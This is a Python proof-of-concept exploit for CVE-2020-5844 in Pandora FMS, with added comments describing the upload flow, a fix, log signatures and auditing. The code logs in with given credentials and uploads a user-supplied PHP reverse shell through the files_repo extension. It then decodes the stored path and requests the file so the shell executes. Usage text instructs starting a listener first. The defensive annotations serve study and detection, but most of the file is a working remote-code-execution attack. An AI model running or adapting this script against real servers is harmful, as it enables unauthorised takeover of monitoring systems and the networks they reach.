import requests
import re
import sys
import urllib.parse
import base64
################################################
# Script by TheCyberGeek #
# Discovered by TheCyberGeek #
# #
# Start Listener before starting this exploit! #
################################################
# Published PoC flow for CVE-2020-5844 (Pandora FMS): log in, push a
# PHP file through the "files_repo" extension, then request the stored file.
# Indentation restored from the whitespace-mangled page; tokens unchanged.
#
# Defensive reading of the same flow:
#   * The server accepts a .php body in files_repo and later serves it from
#     a web-reachable path (the base64 "file=" value below). A fixed release
#     (version not given on this page) and/or serving that repository
#     directory with script execution disabled break the chain.
#   * Log signature: an authenticated POST to
#     "sec2=extensions/files_repo" carrying "add_file", followed by a GET
#     to the decoded repository path. Auditing the repository directory for
#     .php content catches the artifact after the fact.
if len(sys.argv) < 4:
    # Usage text and exit when fewer than four argv entries are present.
    print("""
Usage: python3 CVE-2020-5844.py URL USER PASS PHP_REVERSE_SHELL
Ex: python3 CVE-2020-5844.py http://10.0.0.2/pandora_console admin pandora reverse.php
""")
    sys.exit(0)
else:
    # Positional arguments: console URL, credentials, local PHP file to upload.
    base_path, username, password, rev = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4],
    # One Session so the login cookie is reused by the later requests.
    s = requests.Session()
    # Form login; valid credentials are a precondition (authenticated issue).
    f = s.post(base_path + "/index.php?login=1", data={"nick": username, "pass": password, "login_button": "login"})
    # Presence of "Logout" in the response body is the login-success heuristic.
    if "Logout" in f.text:
        print("[ + ] Logged in!")
        # Multipart upload of the local file under its own name; the file
        # handle is never closed explicitly (process exit releases it).
        file_ = {'upfile': (rev, open(rev, 'rb'), 'application/x-php')}
        # GET of the extension page before the POST — presumably page/session
        # state; nothing visible here depends on its result.
        t = s.get(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo")
        t = s.post(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo", files=file_, data={"add_file": 1})
        # Upload is judged successful if the filename shows up in the listing.
        if rev in t.text:
            print("[ + ] Great. PHP script uploaded... Now going to execute for you...")
            # Pull "file=" (group 1) and "hash=" (group 2) from the download
            # link in the table; only group 1 is used below.
            m = re.search(r"^<td id=\"table2.*?\".*?href=\".*?get_file\.php\?file=(.*?)&hash=(.*?)\" target((?!img).)*$", t.text, re.MULTILINE)
            if m:
                base_location = m.group(1)
                # "file=" is base64; decoding yields the stored path, which
                # the console exposes to any user who can see the listing.
                base64_bytes = base_location.encode('ascii')
                message_bytes = base64.b64decode(base64_bytes)
                file_location = message_bytes.decode('ascii')
                # Strip the console prefix so the path can be appended to
                # base_path (assumes the console lives at /pandora_console).
                x = file_location.replace("/pandora_console", "")
                try:
                    # NOTE: printed before the request is sent, so this line
                    # is not a confirmation of anything.
                    print("[ + ] Shell received. Check your listener!")
                    # Near-zero read timeout: the client does not wait for a
                    # response body; the resulting ReadTimeout is discarded.
                    f = s.get(base_path + x, timeout=0.0000000001)
                except requests.exceptions.ReadTimeout:
                    pass
        else:
            # Dumps the full response for inspection when the name is absent.
            print("[ - ] Failed to upload PHP script...")
            print(t.text)
    else:
        print("[ - ] Cannot login to PandoraFMS...")